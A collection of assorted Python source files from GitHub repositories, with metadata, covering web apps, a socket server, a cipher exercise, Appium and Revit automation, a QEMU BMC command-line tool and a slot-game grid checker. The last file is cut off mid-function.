{"seq_id":"41567559541","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    url(r'^$', include('landing.urls')),\n    # url(r'^blog/', include('blog.urls')),\n    url(r'^register/', include('registration.urls')),\n    url(r'^process/', include('process.urls')),\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^id/', include('getId.urls')),\n    url(r'^summary/(?P<id>\\w{10})/glass', 'process.views.glass'),\n    url(r'^summary/(?P<id>\\w{10})/', 'process.views.summary'),\n    url(r'^login/', 'registration.views.login_user'),\n    url(r'^logout/', 'registration.views.logout_user'), \n    url(r'^contact/', 'contactUs.views.contactUs')\n)\n","repo_name":"nfarve/MoveYourGlass","sub_path":"moveyourglass/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"35958774883","text":"import socket\n\nimport sys\n\nfrom core.serverThread import ServerThread\n\n\nclass ServerManager:\n    def __init__(self, port, thread_count, document_root):\n\n        self.port = int(port)\n        self.thread_count = int(thread_count)\n        self.document_root = document_root\n\n        self.threads = []\n\n    def get_step_function(self, i):\n        def step(index):\n            return i + self.thread_count*index\n        return step\n\n    def run(self):\n        stepper = self.get_step_function(0)\n        stepper2 = self.get_step_function(1)\n\n        tcpServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        tcpServer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        tcpServer.bind(('0.0.0.0', self.port))\n        tcpServer.listen(self.thread_count)\n        # tcpServer.setblocking(False)\n\n        try:\n            for i in range(0, self.thread_count):\n                print('spawning thread', i)\n                thread = ServerThread(tcpServer, self.document_root, self.get_step_function(i))\n                self.threads.append(thread)\n                thread.start()\n        except KeyboardInterrupt:\n            sys.exit()\n\n        for i in range(0, self.thread_count):\n            self.threads[i].join()\n\n","repo_name":"SkynetHackPro/highload","sub_path":"core/serverManager.py","file_name":"serverManager.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"34499466081","text":"import string\n\nletter_map = {}\nlower_case_list = list(string.ascii_lowercase)\n\ndef rotate_letter(letter, n):\n    mini_map = letter_map.setdefault(letter, {})\n    letter_index = lower_case_list.index(letter)\n    return mini_map.setdefault(n, lower_case_list[(letter_index + n) % 26])\n\ndef rotate_word(word, n):\n    result = ''\n    for letter 
in word:\n        result += rotate_letter(letter, n)\n    return result\n\ndef rotate_pair(word, word_dicts):\n    for i in range(1,14):\n        rotated_word = rotate_word(word, i)\n        if rotated_word in word_dicts:\n            print(word, \"-\", rotated_word)\n\ndef make_words_dict():\n    words_dict = {}\n    fin = open('words.txt')\n    for line in fin:\n        word = line.strip()\n        words_dict[word] = 0\n    return words_dict\n\nif __name__ == \"__main__\":\n    words_dict = make_words_dict()\n    for word in words_dict:\n        rotate_pair(word, words_dict)\n    #for i in range(1, 14):\n    #    print(\"Rotate {} to {}\".format(\"zoo\", rotate_word(\"zoo\", i)))\n","repo_name":"pirent/python-playground","sub_path":"thinkpython/exercise1105.py","file_name":"exercise1105.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21642239955","text":"from typing import List, Optional, Union\nfrom fastapi import FastAPI\nimport crud_ops\nimport filters\nimport utils\n\napp = FastAPI()\n\n@app.get('/', status_code=200)\ndef home() -> dict:\n    return {\"message\": \"This is the Home page\", \"status_code\": 200}\n\n\n@app.get('/records', status_code=200)\ndef get_sports_records() -> Union[List[dict], List]:\n    df_records = crud_ops.get_sports_records()\n    records = utils.dataframe_to_list(df=df_records)\n    return records\n\n\n@app.get('/record', status_code=200)\ndef get_sports_record(id_: str) -> dict:\n    dict_record = crud_ops.get_sports_record(id_=id_)\n    return dict_record\n\n\n@app.get('/records/filter', status_code=200)\ndef filter_sports_records(id_: Optional[str] = None,\n                          name: Optional[str] = None,\n                          name__contains: Optional[str] = None,\n                          age: Optional[int] = None,\n                          fav_sport: Optional[str] = None,\n                          min_age: Optional[int] = None,\n                          max_age: Optional[int] = None) -> Union[List[dict], List]:\n    records = filters.filter_sports_records(id_=id_,\n                                            name=name,\n                                            name__contains=name__contains,\n                                            age=age,\n                                            fav_sport=fav_sport,\n                                            min_age=min_age,\n                                            max_age=max_age)\n    return records\n\n\n@app.put('/record/update', status_code=201)\ndef update_sports_record(id_: str,\n                         name: Optional[str] = None,\n                         age: Optional[int] = None,\n                         fav_sport: Optional[str] = None) -> dict:\n    crud_ops.update_sports_record(id_=id_, name=name, age=age, fav_sport=fav_sport)\n    response = {\"message\": \"Record was updated successfully\", \"status_code\": 201}\n    return response\n\n\n@app.post('/record/add', status_code=201)\ndef add_sports_record(name: str, age: int, fav_sport: str) -> dict:\n    crud_ops.add_sports_record(name=name, age=age, fav_sport=fav_sport)\n    response = {\"message\": \"Record was added successfully\", \"status_code\": 201}\n    return response\n\n\n@app.delete('/record/delete', status_code=200)\ndef delete_sports_record(id_: str) -> dict:\n    crud_ops.delete_sports_record(id_=id_)\n    response = {\"message\": \"Record was deleted successfully\", \"status_code\": 200}\n    return response","repo_name":"Nishant173/first-fastapi","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"29709732874","text":"def validar_string(pergunta,min,max):\r\n    x = input(pergunta)\r\n    tam = len(x)\r\n    while tam < min or tam > max:\r\n        x = input(pergunta)\r\n        tam = len(x) # re-measure the new input so the loop can actually terminate instead of breaking after one retry\r\n    return x\r\n\r\n# Main program\r\nx = validar_string('Digite uma frase:',0,9) # min and max allowed length of the string\r\nprint('Voce 
digitou ---> {}'.format(x))\n","repo_name":"Alesal2021/Rotina","sub_path":"Validar uma string.py","file_name":"Validar uma string.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33368630435","text":"import PyDIP as dip\nimport cbor2\nfrom skimage import io\nimport cv2\nimport PIL\nimport numpy as np\n\nimg = dip.ImageReadTIFF('NucleiLabels.tif') \nchain_codes = dip.GetImageChainCodes(img)\nprint(\"Nuclei found:\", len(chain_codes))\ncentroids = []\nfor c in chain_codes:\n centroids.append(c.Polygon().Centroid())\n\ncentroids = np.asarray(centroids)\n\nnuclei_data = {'xPositions': tuple(centroids[:, 0]), 'yPositions': tuple(centroids[:, 1])}\n\nwith open('nuclei.cbor', 'wb') as fp:\n cbor2.dump(nuclei_data, fp)\n \nim = io.imread('NucleiLabels.tif')\n\nim[im > 0] = 255\nim[im <= 0] = 0\nim = im.astype(np.uint8)\n\nPIL.Image.fromarray(im).save('mask.png')\n","repo_name":"luminosuslight/pathology-ml-model-training","sub_path":"server/convert_label_image_to_centroids_and_mask.py","file_name":"convert_label_image_to_centroids_and_mask.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13230792782","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport argparse\n\nimport virtbmc.utils as utils\nfrom virtbmc.version import version\nfrom virtbmc import models\nfrom virtbmc import manager\n\n\ndef init_argparser():\n parser = argparse.ArgumentParser(\n prog='qemu-vbmc',\n description='%(prog)s Qemu virtual BMC simulation tool',\n )\n parser.add_argument(\"-v\", \"--version\", help=\"Show version\",\n action='version', version='%(prog)s'+' %s' % version())\n\n subparsers = parser.add_subparsers(help='commands')\n\n # Options shared by all subparsers\n parent_parser = argparse.ArgumentParser(add_help=False)\n parent_parser.add_argument(\"-d\", \"--verbose\", help=\"increase output verbosity\",\n action=\"store_true\")\n\n # Database\n db_parser = subparsers.add_parser(\n 'db', parents=[parent_parser],\n help='Database management',\n )\n db_parser.add_argument('--init', action='store_true', help='Init sqlite database')\n db_parser.add_argument('--remove', action='store_true', help='Remove sqlite database')\n db_parser.set_defaults(func=models.manage)\n\n # Create\n create_parser = subparsers.add_parser(\n 'create', parents=[parent_parser],\n help='Create VMs with BMC',\n )\n create_parser.add_argument(\"-u\", \"--ipmi-user\", help=\"ipmi user\")\n create_parser.add_argument(\"-p\", \"--ipmi-password\", help=\"ipmi password\")\n create_parser.add_argument(\"-n\", \"--number\", type=int, default=0,\n help=\"start virtual qemu bmc of a given number\")\n create_parser.add_argument(\"--image-size\", type=str, dest='image_size',\n default='20G', help=\"specified image size used by qemu/kvm\")\n create_parser.add_argument(\"-b\", \"--bridge\", type=str, default='br0',\n help=\"bridge interface name\")\n create_parser.add_argument(\"--qemu\", type=str, default='/opt/qemu2.7/bin/qemu-system-x86_64',\n help=\"qemu binary execute path\")\n create_parser.add_argument(\"--ipmi-sim\", type=str, dest=\"ipmi_sim\",\n default='/opt/openipmi/bin/ipmi_sim', help=\"ipmi-sim binary execute path\")\n create_parser.add_argument(\"--memory\", type=int, default=4096,\n help=\"qemu VM memory size\")\n create_parser.add_argument(\"--ncpu\", type=int, default=1,\n help=\"qemu VM cpu number\")\n 
create_parser.add_argument(\"--template\", type=str, default=utils.dirname(__file__, 1)+os.sep+'templates',\n help=\"template scripts dirpath\")\n create_parser.set_defaults(func=manager.create)\n\n # Start\n start_parser = subparsers.add_parser(\n 'start', parents=[parent_parser],\n help='Start VMs with BMC',\n )\n start_parser.add_argument(\"bmc\", nargs='+',\n help=\"start BMC, default start all\")\n start_parser.add_argument(\"--vm\", dest='autostart_vm',\n help=\"autostart qemu vm when BMC run\",\n action=\"store_true\")\n start_parser.set_defaults(func=manager.start)\n\n # List\n list_parser = subparsers.add_parser(\n 'list', parents=[parent_parser],\n help='List VMs',\n )\n list_parser.add_argument(\"--json\", help=\"json output\",\n action=\"store_true\")\n list_parser.set_defaults(func=manager.list_all)\n\n # Update\n update_parser = subparsers.add_parser(\n 'update', parents=[parent_parser],\n help='Update VMs',\n )\n update_parser.add_argument('id', nargs='+',\n help='Update specify BMCs')\n update_parser.add_argument(\"-u\", \"--ipmi-user\", help=\"ipmi user\")\n update_parser.add_argument(\"-p\", \"--ipmi-password\", help=\"ipmi password\")\n update_parser.add_argument(\"--json\", help=\"json output\",\n action=\"store_true\")\n update_parser.set_defaults(func=manager.update)\n\n # Delete\n delete_parser = subparsers.add_parser(\n 'delete', parents=[parent_parser],\n help='Delete Vm',\n )\n delete_parser.add_argument('id', nargs='+',\n help='Delete specify BMCs')\n delete_parser.set_defaults(func=manager.delete)\n\n # Stop\n stop_parser = subparsers.add_parser(\n 'stop', parents=[parent_parser],\n help='Stop BMCs & Vms',\n )\n stop_parser.add_argument(\"id\", nargs='+',\n help=\"stop specify BMCs & Vms\")\n stop_parser.set_defaults(func=manager.stop)\n\n return parser\n\n\ndef check_args(parser):\n\n def error_exit(msg):\n parser.print_help()\n sys.exit(msg)\n\n args = parser.parse_args()\n return parser, args\n\n\n_opt_parser = None\n_args = None\n\n\ndef get_parser():\n return _opt_parser\n\n\ndef get_args():\n return _args\n\n\ndef init():\n global _opt_parser\n global _args\n if not _opt_parser or not _args:\n _opt_parser, _args = check_args(init_argparser())\n","repo_name":"zexi/vbmc-qemu","sub_path":"virtbmc/optparse.py","file_name":"optparse.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"73037160427","text":"import random\nimport threading\nimport time\n\nimport threadpool\nimport psycopg2\n\ntmp = []\n\n\ndef select():\n s = \"select * from student where student_name = '李谢恩';\"\n connection = psycopg2.connect(database='db_project1', user='lee', password='buzz10161', host='localhost',\n port=5432)\n con = connection.cursor()\n start = time.time()\n con.execute(s)\n connection.commit()\n con.fetchone()\n end = time.time()\n con.close()\n connection.close()\n tmp.append((end - start))\n\n\nif __name__ == '__main__':\n threads = []\n for i in range(1, 501):\n threads.append(threading.Thread(target=select()))\n for t in threads:\n t.start()\n tt = 0\n for i in tmp:\n tt = tt + i\n print('Average time: ' + str(round((tt / 100), 4)))\n","repo_name":"Buzzy0423/SUSTECH_UG_Resource","sub_path":"CS307_Database/DB_project1_py/High_concurrency.py","file_name":"High_concurrency.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7049664991","text":"import random\nimport 
time\n\nhigher_vals = [] #Store all values that are higher than the number\nlower_vals = [] #Store all values that are lower than the number\nlower_vals.append(int (input ( \"Minimum value:\")))\nhigher_vals.append(int (input ( \"Maximum value:\")))\n# start from the midpoint of the range; without adding the minimum the first guess is wrong whenever min > 0\nattempt = lower_vals[0] + int((higher_vals[0]-lower_vals[0])/2)\ntries = 1\nprint(\"Think about a secret number, I'll guess it\")\nprint(\"Is it \"+ str(attempt)+\"?\")\nuser_inp = input()\nwhile user_inp != \"same\":\n    if user_inp == \"higher\":\n        print(\"in high\")\n        lower_vals.append(attempt)\n        attempt = attempt + int((higher_vals[-1]-lower_vals[-1])/2)\n    else:\n        print(\"in low\")\n        higher_vals.append(attempt)\n        attempt = attempt - int((higher_vals[-1]-lower_vals[-1])/2)\n    print(\"Is it \"+ str(attempt)+\"?\")\n    user_inp = input()\n    tries +=1\nprint(\"Nice, attempted: \"+str(tries)+ \" times.\")","repo_name":"cifpfbmoll/practica-6-python-MASACR99","sub_path":"exercise6.12.py","file_name":"exercise6.12.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"16216488283","text":"# -*- coding: UTF-8 -*-\nimport os\nimport socket\nimport subprocess\nimport time\nimport traceback\nfrom os.path import dirname, abspath\n\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom common import config\nfrom common.logger import logger\n\n\nclass APP:\n    def __init__(self):\n        self.driver = None\n        self.caps = {}\n        self.port = '4723'\n\n    def runCMD(self,command):\n        \"\"\"\n        命令前加\"start /b \"则不显示命令窗口;命令前加\"cmd /c start \"则显示命令窗口\n        :param command:\n        :return:\n        \"\"\"\n        # os.popen('cmd /c start ' + command)\n        p = subprocess.Popen('cmd /c start ' + command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n        p.wait()\n        # os.system(command)\n        logger.info('运行cmd命令:' + str('start /b ' + 'cmd /c start ' + command) + '成功')\n\n    def openAppium(self,port='4723'):\n        self.port = port\n        self.caps = {}\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        try:\n            s.connect(('127.0.0.1', int(port)))\n            s.shutdown(2)\n            logger.error('port %s is in use!' % port)\n            portstatus = False\n        except:\n            logger.info('port %s is available!' 
% port)\n portstatus = True\n bootstrap_port = str(int(port) + 1)\n dir_path = dirname(dirname(abspath(__file__)))\n logPath = dir_path + \"/lib/logs/AppiumLog.log\";\n try:\n if portstatus:\n cmd = 'cmd /c start appium -a ' + '127.0.0.1 -p ' + str(port) + ' --bootstrap-port ' + str(bootstrap_port) + \" --log \" + logPath + \" --log-timestamp --local-timezone\"\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n logger.info('运行cmd命令:' + str('start /b ' + cmd) + '成功')\n p.wait()\n except Exception as e:\n logger.info('运行cmd命令:' + str('start /b ' + cmd) + '失败')\n logger.error(str(e))\n\n def openPackage(self,deviceName = \"7555\",appPackage = \"com.android.browser\",appActivity = \".BrowserActivity\"):\n config.get_config('../lib/conf/conf.properties')\n self.caps = {}\n self.caps[\"deviceName\"] = config.config['deviceName' + deviceName]\n self.caps[\"platformName\"] = config.config['platformName' + deviceName]\n self.caps[\"platformVersion\"] = config.config['platformVersion' + deviceName]\n self.caps[\"appPackage\"] = appPackage\n self.caps[\"appActivity\"] = appActivity\n self.caps[\"noReset\"] = True\n # 下面chromeOptions的添加很重要,涉及小程序的能否定位\n if appPackage == 'com.tencent.mm':\n self.caps['chromeOptions'] = {'androidProcess': 'com.tencent.mm:appbrand0'}\n elif appPackage == 'com.tencent.mobileqq':\n self.caps['chromeOptions'] = {'androidProcess': 'com.tencent.mobileqq:mini'}\n else:\n pass\n self.driver = webdriver.Remote(\"http://127.0.0.1:\" + self.port + \"/wd/hub\", self.caps)\n self.driver.implicitly_wait(30)\n logger.info('使用设备:' + config.config['deviceName' + deviceName] + '打开应用:' + appPackage + '成功')\n\n def visitH5(self,url,deviceName = \"7555\",browserName = \"Browser\"):\n config.get_config('../lib/conf/conf.properties')\n self.caps = {}\n self.caps[\"deviceName\"] = config.config['deviceName' + deviceName]\n self.caps[\"platformName\"] = config.config['platformName' + deviceName]\n self.caps[\"platformVersion\"] = config.config['platformVersion' + deviceName]\n self.caps[\"browserName\"] = browserName\n self.caps[\"noReset\"] = True\n self.driver = webdriver.Remote(\"http://127.0.0.1:\" + self.port + \"/wd/hub\", self.caps)\n self.driver.implicitly_wait(30)\n self.driver.get(url)\n if browserName == 'chrome':\n try:\n WebDriverWait(self.driver, 10, 1).until(lambda x: x.find_element_by_xpath('//*[@text=\"否\"]')).click()\n logger.info('翻译提示已出现,且关闭')\n except:\n logger.info('翻译提示未出现')\n else:\n pass\n logger.info('获取到的当前句柄:' + str(self.driver.contexts))\n logger.info('使用浏览器:' + browserName + '打开网站:' + url + '成功')\n\n def switchContext(self, name):\n self.driver.switch_to.context(name)\n logger.info('切换句柄为:' + name + '成功')\n\n\n\n def clickById(self,eId):\n self.driver.find_element_by_id(eId).click()\n logger.info('点击元素ID为:' + eId + '成功')\n\n def clickByXpath(self,eXpath):\n self.driver.find_element_by_xpath(eXpath).click()\n logger.info('点击元素xpath为:' + eXpath + '成功')\n\n def clearTextById(self,eId):\n self.driver.find_element_by_id(eId).clear()\n logger.info('清除元素ID:' + eId + '成功')\n\n def clearTextByXpath(self,eXpath):\n self.driver.find_element_by_xpath(eXpath).clear()\n logger.info('清除元素xpath:' + eXpath + '成功')\n\n def inputTextById(self,eId,eText):\n self.driver.find_element_by_id(eId).send_keys(eText)\n logger.info('对元素ID:' + eId + '发送文本:' + eText + '成功')\n\n def inputTextByXpath(self,eXpath,eText):\n self.driver.find_element_by_xpath(eXpath).send_keys(eText)\n logger.info('对元素xpath:' + eXpath + '发送文本:' + eText + '成功')\n\n def 
keyEvent(self,num):\n num = int(num)\n self.driver.keyevent(num)\n logger.info('操作keyevent:' + str(num) + '成功')\n\n def waitMust(self,etime):\n time.sleep(int(etime))\n logger.info('强制等待:' + etime + '成功')\n\n def swipeUp(self, t=500, n=1):\n '''向上滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.5 # x坐标\n y1 = l['height'] * 0.75 # 起始y坐标\n y2 = l['height'] * 0.25 # 终点y坐标\n for i in range(n):\n self.driver.swipe(x1, y1, x1, y2, t)\n\n def swipeDown(self, t=500, n=1):\n '''向下滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.5 # x坐标\n y1 = l['height'] * 0.25 # 起始y坐标\n y2 = l['height'] * 0.75 # 终点y坐标\n for i in range(n):\n self.driver.swipe(x1, y1, x1, y2, t)\n\n def swipLeft(self, t=500, n=1):\n '''向左滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.75\n y1 = l['height'] * 0.5\n x2 = l['width'] * 0.25\n for i in range(n):\n self.driver.swipe(x1, y1, x2, y1, t)\n\n def swipRight(self, t=500, n=1):\n '''向右滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.25\n y1 = l['height'] * 0.5\n x2 = l['width'] * 0.75\n for i in range(n):\n self.driver.swipe(x1, y1, x2, y1, t)\n\n def swipScreen(self,sx,sy,ex,ey,eTime):\n self.driver.swipe(int(sx), int(sy), int(ex), int(ey), int(float(eTime) * 1000))\n\n # 长按ID\n def longPressById(self,eId,eTime):\n TouchAction(self.driver).long_press(self.driver.find_element_by_id(eId)).wait(\n int(float(eTime) * 1000)).perform()\n\n # 长按Xpath\n def longPressByXpath(self, eXpath, eTime):\n TouchAction(self.driver).long_press(self.driver.find_element_by_xpath(eXpath)).wait(\n int(float(eTime) * 1000)).perform()\n\n # 点击坐标eCoor=(615, 52), (690, 146),eTime是秒\n def tapCoor(self,eCoor,eTime):\n self.driver.tap('[' + eCoor + ']', int(float(eTime)*1000))\n logger.info(\"点击坐标:\" + eCoor +\"成功\")\n\n # 关闭应用\n def colseApp(self):\n self.driver.close_app()\n\n # 切换到指定iframe\n def switchToFrame(self,eXpath):\n elc = self.driver.find_element_by_xpath(eXpath)\n self.driver.switch_to.frame(elc)\n logger.info(\"切换到指定frame\" + eXpath +\"成功\")\n\n # 回到上一个iframe\n def switchToLastFrame(self):\n self.driver.switch_to.parent_frame()\n logger.info(\"回到上一个iframe成功\")\n\n # 回到最外层iframe\n def switchToParentFrame(self):\n self.driver.switch_to.default_content()\n logger.info(\"回到最外层iframe成功\")\n\n # 切换新窗口\n def switchWindowColseOld(self):\n handle = self.driver.current_window_handle\n handles = self.driver.window_handles\n for h in handles:\n if handle != h:\n new = h\n self.driver.close()\n self.driver.switch_to.window(new)\n logger.info(\"切换新窗口成功\")\n\n # 关闭其他窗口\n def closeOldWindow(self):\n handle = self.driver.current_window_handle\n for temHandle in self.driver.window_handles:\n if temHandle != handle:\n self.driver.close()\n self.driver.switch_to().window(temHandle)\n logger.info(\"关闭其他窗口成功\")\n\n # 调用js操作页面,如window.scrollBy(0,300),每次向下滑动页面300像素点,window.scroll(0,3000)移动到0,3000像素点位置\n def excuteJs(self, js):\n try:\n self.driver.execute_script(js)\n logger.info(\"操作js:\" + js + \"成功\")\n except Exception as e:\n logger.error(str(traceback.format_exc()))\n\n # 针对按索引进行切换下拉列表option属性\n def selectByIndex(self, eXpath, index):\n Select(self.driver.find_element_by_xpath(eXpath)).select_by_index(index)\n logger.info(\"查找:\" + eXpath + \"中的索引:\" + index + \"成功\")\n\n # 针对按value进行切换下拉列表option属性\n def selectByValue(self, eXpath, value):\n Select(self.driver.find_element_by_xpath(eXpath)).select_by_value(value)\n logger.info(\"查找:\" + eXpath + \"中的值:\" + value + \"成功\")\n\n # 针对按text文本进行切换下拉列表option属性\n def selectByText(self, eXpath, 
text):\n Select(self.driver.find_element_by_xpath(eXpath)).select_by_visible_text(text)\n logger.info(\"查找:\" + eXpath + \"中的文本:\" + text + \"成功\")\n\n # 针对按索引进行取消下拉列表option属性\n def deselectByIndex(self, eXpath, index):\n Select(self.driver.find_element_by_xpath(eXpath)).deselect_by_index(index)\n logger.info(\"取消:\" + eXpath + \"中的索引:\" + index + \"成功\")\n\n # 针对按value进行取消下拉列表option属性\n def deselectByValue(self, eXpath, value):\n Select(self.driver.find_element_by_xpath(eXpath)).deselect_by_value(value)\n logger.info(\"取消:\" + eXpath + \"中的值:\" + value + \"成功\")\n\n # 针对按text文本进行取消下拉列表option属性\n def deselectByText(self, eXpath, text):\n Select(self.driver.find_element_by_xpath(eXpath)).deselect_by_visible_text(text)\n logger.info(\"取消:\" + eXpath + \"中的文本:\" + text + \"成功\")","repo_name":"lizheng1990/AutoFrameTest","sub_path":"app/appkeyword.py","file_name":"appkeyword.py","file_ext":"py","file_size_in_byte":11218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43054935768","text":"__title__ = \"Rename Elements Engine\"\n__author__ = \"WeWork Design Technology West - Alvaro Luna\"\n__helpurl__ = \"google.com\"\n__min_revit_ver__ = 2017\n__max_revit_ver__ = 2019\n__version__ = \"2.0\"\n\n# WW private global variables | https://www.uuidgenerator.net/version4\n__uiud__ = \"find new\"\n__parameters__ = []\n\n# standard modules\nimport clr # noqa E402\nimport math # noqa E402\nimport os # noqa E402\nimport re # noqa E402\nimport rpw # noqa E402\nimport sys # noqa E402\nimport System # noqa E402\n\nfrom pyrevit import script # noqa E402\n\n# Revit API modules\nclr.AddReference('RevitAPI')\nclr.AddReference('RevitAPIUI')\nimport Autodesk # noqa E402\nfrom Autodesk.Revit.UI import * # noqa E402\nfrom Autodesk.Revit.DB import * # noqa E402\nimport Autodesk.Revit.UI.Selection # noqa E402\n\n# rename elements modules\nimport RenameElements_GUI as REGUI\n\nclass CollectElements:\n def __init__(self):\n # CollectViews output\n self.allViewObjs = None\n \n # CollectSheets output\n self.allSheetObjs = None\n \n # CollectRooms output\n self.allRoomObjs = None\n \n def CollectViews(self):\n self.allViewObjs = [i for i in FilteredElementCollector(self.doc).OfClass(View)\n if self.searchString in i.Name]\n names = [i.Name for i in self.allViewObjs] # not really needed\n return(self.allViewObjs)\n\n def CollectSheets(self):\n self.allSheetObjs = [i for i in FilteredElementCollector(self.doc).OfClass(ViewSheet)]\n return(self.allSheetObjs)\n \n def CollectRooms(self):\n # FilteredElementCollector(self.doc).OfClass(SpatialElement)\n self.allRoomObjs = [i for i in FilteredElementCollector(self.doc).OfCategory(BuiltInCategory.OST_Rooms) \n if \"container\" not in i.Level.Name.lower()] \n return(self.allRoomObjs)\n\nclass RenameElements:\n def __init__(self):\n pass\n \n def RenameViews(self):\n t = Transaction(self.doc, \"Renaming views\")\n t.Start()\n for obj in self.allViewObjs:\n try:\n obj.Name = obj.Name.replace(self.searchString, self.targetString)\n except: pass\n t.Commit()\n \n def RenameSheets(self):\n t = Transaction(self.doc, \"Renaming sheets\")\n t.Start()\n for obj in self.allSheetObjs:\n try:\n newNumber = obj.get_Parameter(BuiltInParameter.SHEET_NUMBER).Set(obj.SheetNumber.Replace(self.searchString, self.targetString))\n print(newNumber)\n except: pass\n t.Commit()\n \n def RenameRooms(self):\n t = Transaction(self.doc, \"Renaming rooms\")\n t.Start()\n for obj in self.allRoomObjs:\n try:\n obj.Name = 
obj.Name.replace(self.searchString, self.targetString)\n except: pass\n t.Commit() \n\nclass DerivedClass(CollectElements, RenameElements):\n def __init__(self, searchString=None, targetString=None):\n # default input parameters, to be updated by GUI selection\n self.searchString = searchString\n self.targetString = targetString\n \n # revit doc parameters\n self.doc = __revit__.ActiveUIDocument.Document\n self.app = __revit__.Application\n self.version = __revit__.Application.VersionNumber.ToString()\n self.uidoc = __revit__.ActiveUIDocument\n self.currentView = __revit__.ActiveUIDocument.ActiveView\n \n # class inheritance / polymorphism\n CollectElements.__init__(self)\n \n def Run_RenameElements(self):\n # generate GUI\n formObj = REGUI.RE_Form()\n formObj.Run_Form()\n \n # convert default none values to string outputs based on form selection\n self.searchString = formObj.searchString\n self.targetString = formObj.targetString\n \n if formObj.viewsBoolean:\n self.CollectViews()\n self.RenameViews()\n \n if formObj.sheetsBoolean:\n self.CollectSheets()\n self.RenameSheets()","repo_name":"tkahng/pyWest","sub_path":"pyWest.extension/pyWest.tab/Revit Tools.panel/WW_Rename.pulldown/lib/RenameElements_Engine.py","file_name":"RenameElements_Engine.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"19698695967","text":"import numpy as np\nimport random\n\n# Just random columns I made for testing. Replace with your own.\ncolumns = [\n ['⭐', '🟩', '🃏', '⭐', '🔷', '🔶'],\n ['⭐', '⭐', '🔶', '⭐', '🔷', '🔶'],\n ['🔷', '🟩', '🔷', '🟩', '🃏', '🔶'],\n ['⭐', '🟩', '🔷', '🟩', '🔷', '🃏'],\n ['⭐', '🟩', '🔷', '🟩', '🔷', '🔶'],\n ['⭐', '🃏', '🔷', '🟩', '🔷', '🔶']\n]\n\nbonus_symbol = '🃏' # Bonus symbol for testing. Replace with your own.\n\n\ndef play_round():\n # Ok so I think this might be the best way to do it. It will take your list into a 2d array as the columns.\n reel = np.array(columns) # Puts the lists into an array as columns\n\n # Calculate all winning clusters in the reel.\n # Check the center 2x2 grid\n center = reel[2:4, 2:4] # Evaluate the center 2x2 grid\n print(center)\n clusters_center = get_clusters(center)\n clusters = get_clusters(center)\n print(\"Number of clusters in Center: \", len(clusters_center))\n\n # Check the secondary 4x4 grid\n secondary = reel[1:5, 1:5] # Evaluate the secondary 4x4 grid\n print(secondary)\n clusters = get_clusters(secondary)\n clusters_secondary = get_clusters(secondary)\n print(\"Number of clusters in Secondary: \", len(clusters_secondary))\n\n # Check the whole 6x6 grid\n print(reel)\n clusters_whole = get_clusters(reel)\n clusters = get_clusters(reel) # Evaluate the whole 6x6 grid\n print(\"Number of clusters in Whole: \", len(clusters_whole))\n\n # Prints data, prob wont need this for your sim\n print(\"----------------------------------------------------\")\n\n # Check if the BIG FOUR SYMBOL is in a corner. Its the star symbol.\n # corners = [reel[0, 0], reel[0, -1], reel[-1, 0], reel[-1, -1]]\n\n # if '⭐' in corners and grid_size < 6:\n # # If the BIG FOUR SYMBOL is in a corner, increase the grid size for the next round.\n # return grid_size + 2\n # else:\n # # If the BIG FOUR SYMBOL is not in a corner, reset the grid size to 2x2 for the next round.\n # return 2\n\n\ndef get_clusters(reel):\n # Create a 2D boolean array of the same shape as the reel,\n # with all elements initially set to False. 
